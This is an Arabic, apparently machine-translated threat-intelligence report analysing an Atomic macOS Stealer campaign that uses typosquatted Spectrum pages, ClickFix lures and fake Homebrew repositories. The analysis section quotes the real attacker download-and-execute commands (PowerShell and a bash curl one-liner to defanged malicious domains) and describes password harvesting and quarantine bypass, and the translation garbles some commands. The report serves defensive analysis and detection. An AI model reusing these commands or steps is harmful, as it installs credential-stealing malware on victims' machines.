🚀 لقد رفعت CloudSek جولة B1 من السلسلة B1 بقيمة 19 مليون دولار - تعزيز مستقبل الأمن السيبراني التنبؤي
اقرأ المزيد
ملخص تنفيذي
تم الكشف عن حملة جديدة لنسخة Atomic macOS Stealer (AMOS)، للاستفادة من النطاقات المطبعية التي تحاكي Spectrum، وهي شركة اتصالات مقرها الولايات المتحدة. تستخدم الحملة طريقة Clickfix وتقدم حمولات مختلفة بناءً على نظام تشغيل الضحية. والجدير بالذكر أن مستخدمي macOS يحصلون على برنامج نصي ضار مصمم لسرقة كلمات مرور النظام وتنزيل متغير AMOS لمزيد من الاستغلال. يستخدم البرنامج النصي أوامر macOS الأصلية لجمع بيانات الاعتماد وتجاوز آليات الأمان وتنفيذ الثنائيات الضارة. تشير التعليقات باللغة الروسية في شفرة المصدر إلى تورط مجرمي الإنترنت الناطقين بالروسية. يشير المنطق الذي يتم تنفيذه بشكل سيئ في مواقع التسليم، مثل التعليمات غير المتطابقة عبر المنصات، إلى بنية تحتية تم تجميعها على عجل. تسلط هذه الحملة الضوء على الاتجاه المتزايد في هجمات الهندسة الاجتماعية متعددة المنصات التي تستهدف المستخدمين من المستهلكين والشركات.
التحليل
خلال دورة اكتشاف وإسناد البنية التحتية الروتينية للمهاجمين، اكتشفنا عددًا من مواقع التسليم التي تحمل عنوان Clickfix والتي وُجد أنها تقوم بطباعة Spectrum، وهي شركة مقرها الولايات المتحدة تقدم خدمات للتلفزيون الكبلي، والوصول إلى الإنترنت، وأمن الإنترنت، والخدمات المُدارة، والهاتف المحمول، والاتصالات الموحدة.
عندما تنقر الضحية على «التحقق البديل»، يتم نسخ الأمر إلى الحافظة، ويتم عرض التعليمات للضحية لاتباعها. تمامًا مثل أي حملة Clickfix أخرى.
ومع ذلك، بعد إجراء مزيد من التحقيق، اكتشفنا أن موقع الويب قدم ردودًا مختلفة بناءً على وكلاء مستخدمين مختلفين.
الحافظة - وكيل مستخدم غير macOS
بوويرشيل - لا يوجد ملف شخصي - تجاوز سياسة التنفيذ - الأمر «$file = [System.IO.path] ::الجمع ($env: Temp، 'api.ps1')؛ استدعاء - طلب الويب - عنوان URL 'https://cf-verifi[.]pages[.]dev/i.txt' - ملف الخروج $file؛ & $file» # Cloudflare
هذه إحدى طرق التسليم الأكثر استخدامًا لمستخدمي Windows.
الحافظة - وكيل مستخدم macOS
/bin/bash -c «$ (curl -fSSL https://applemacios[.]com/getrur/install.sh)» # التحقق من نظام التشغيل macOS #248187 المصادق عليه بواسطة Cloudflare. حقوق النشر محفوظة لشركة كلاود فلير 2025.
/بين/باش -c» ... «: هذا يخبر النظام بـ قم بتشغيل الأمر داخل علامات الاقتباس باستخدام قذيفة باش.
<URL>كيرل -FSSL:
- -f: فشل بصمت عند حدوث أخطاء HTTP.
- -s: الوضع الصامت (لا يوجد مخرج للتقدم).
- -S: أظهر الخطأ إذا تم استخدام -s وفشل الطلب.
- -L: اتبع عمليات إعادة التوجيه.
- يقوم بتنزيل محتويات البرنامج النصي المستضاف على https://applemacios[.]com/getrur/install.sh.
ناتج curl (أي البرنامج النصي install.sh) هو تم تنفيذه على الفور بواسطة Bash.
محتويات ملف install.sh
حصاد كلمات المرور:
- يحصل على المستخدم الحالي: اسم المستخدم = $ (whoami)
- حلقة موجه كلمة المرور: يطالب باستمرار بـ «كلمة مرور النظام:» حتى يتم إدخال كلمة المرور الصحيحة
- التحقق من كلمة المرور: يستخدم القرص. -authonly للتحقق من كلمة المرور مقابل خدمات دليل macOS
- تخزين كلمة المرور: يحفظ كلمة المرور الصالحة إلى ملف /tmp/.pass
التنزيل والتنفيذ:
- حمولة التنزيلات: curl -o/tmp/تحديث https://applemacios[.]com/getrur/update
- يزيل الحجر الصحي: يستخدم كلمة مرور مسروقة مع sudo -S xattr -c لتجاوز أمان macOS
- يجعلها قابلة للتنفيذ: chmod +x/tmp/التحديث
- ينفذ البرامج الضارة: يقوم بتشغيل الملف الذي تم تنزيله /tmp/update
عند تحليل الملف المحفوظ كـ «تحديث» ضمن دليل «tmp»، اكتشفنا أن البرامج الضارة تنتمي إلى عائلة Atomic macOS Stealer (AMOS). شوهدت متغيرات AMOS مثل Poseidon و Odyssey في البرية مؤخرًا، واكتسبت زخمًا بين مجرمي الإنترنت.
أحدث طريقة توصيل
بعد كشف CloudSek عن تكتيكاتها وشبكتها، تحول المتسللون إلى طريقة توزيع جديدة: إعلانات ضارة لمستودعات GitHub المزيفة التي تستهدف المطورين الذين يستخدمون HomeBrew. (h/t جيروم سيجورا - Malwarebytes)
يعكس تسلسل الهجوم المرصود الحالة التي تم التحقيق فيها سابقًا، والتي تتضمن نصًا خادعًا («install [.] sh») يجلب حمولة «تحديث»، وهي نوع من AMOS. تتكشف عملية العدوى على النحو التالي:
- تقوم الإعلانات غير الصحية/Clickfix بإعادة توجيه المستخدمين إلى المحطة الطرفية الخاصة بهم.
- عند تنفيذ البرنامج النصي «install [.] sh»، فإنه يجمع تفاصيل المستخدم، ويطلب كلمات المرور ويتحقق منها، ثم يحفظها.
- بعد ذلك، يقوم باسترداد حمولة متغير AMOS وتكوينه للإطلاق التلقائي عبر bash.
- يتم تنفيذ حمولة متغير AMOS تلقائيًا بعد التثبيت [.] sh.
في 6 يونيو 2025، أنشأ ممثل التهديد مستودع «Homebrew» المزيف.
تم تنفيذ هذه الالتزامات ببساطة لاستبدال خوادم الأوامر والتحكم القديمة بخوادم جديدة.
كما نرى أعلاه، قام ممثل التهديد بإزالة C2 الحالي وإضافة مسار تثبيت Homebrew الشرعي (raw github)، والذي من المرجح أن يثبت صحة الإعلانات الخاطئة.
في وقت لاحق، تم استبدال عنوان URL الشرعي بـ C2s التي يتحكم فيها المهاجم. تمت إضافة جميع IOCs من المستودع إلى الجدول في نهاية هذا التقرير.
الإسناد
أثناء فحص الكود المصدري لصفحة التسليم، صادفنا بعض التعليقات باللغة الروسية، مما يشير إلى أنه من المحتمل أن يتم نشر البرامج الضارة عن طريق مجرمو الإنترنت الناطقون بالروسية. باستخدام هذه التعليقات كنقطة محورية، إلى جانب معلمات HTTP الأخرى، تمكنا من العثور على IOFAs بالإضافة إلى IOCs.
تحتوي صفحات التسليم المعنية لحملة AMOS المتغيرة هذه على أخطاء في كل من البرمجة ومنطق الواجهة الأمامية. بالنسبة لوكلاء مستخدمي Linux، تم نسخ أمر PowerShell. علاوة على ذلك، تم عرض التعليمات «اضغط مع الاستمرار على مفتاح Windows+ R» لكل من مستخدمي Windows و Mac.
التكتيكات والتقنيات والإجراءات
ICOs وIOFAs
التأثير
- تسوية بيانات اعتماد الشركات: من خلال جمع كلمات مرور مستخدمي macOS، يمكن للمهاجمين الوصول إلى أنظمة الشركة وشبكات VPN والموارد الداخلية، مما قد يتيح الحركة الجانبية.
- تجاوز عناصر التحكم في أمان نقطة النهاية: تستخدم البرامج الضارة أدوات مساعدة مشروعة (dscl، sudo، xattr) لتجاوز آليات أمان macOS، مما يقلل من فرصة الكشف عن طريق حلول مكافحة الفيروسات التقليدية أو EDR.
- الوصول الأولي لعمليات التدخل الأوسع: قد يتم بيع بيانات الاعتماد المسروقة والوصول المستمر إلى وسطاء الوصول أو استخدامها لهجمات المتابعة مثل برامج الفدية أو سرقة البيانات.
عوامل التخفيف
- تدريب توعية المستخدم: تثقيف الموظفين والمستخدمين حول أساليب سرقة كلمة المرور، وخاصة تلك التي تتنكر في شكل مطالبات التحقق من النظام.
- تصلب نقطة النهاية في macOS: فرض حماية تكامل النظام وتقييد تنفيذ البرامج النصية غير الموقعة باستخدام أدوات مثل سياسات Gatekeeper و MDM.
- البحث عن التهديدات لنشاط AMOS: راقب السجلات ونقاط النهاية بحثًا عن علامات إساءة استخدام موجه كلمة المرور ونشاط sudo غير المعتاد ومؤشرات AMOS المعروفة.
المراجع
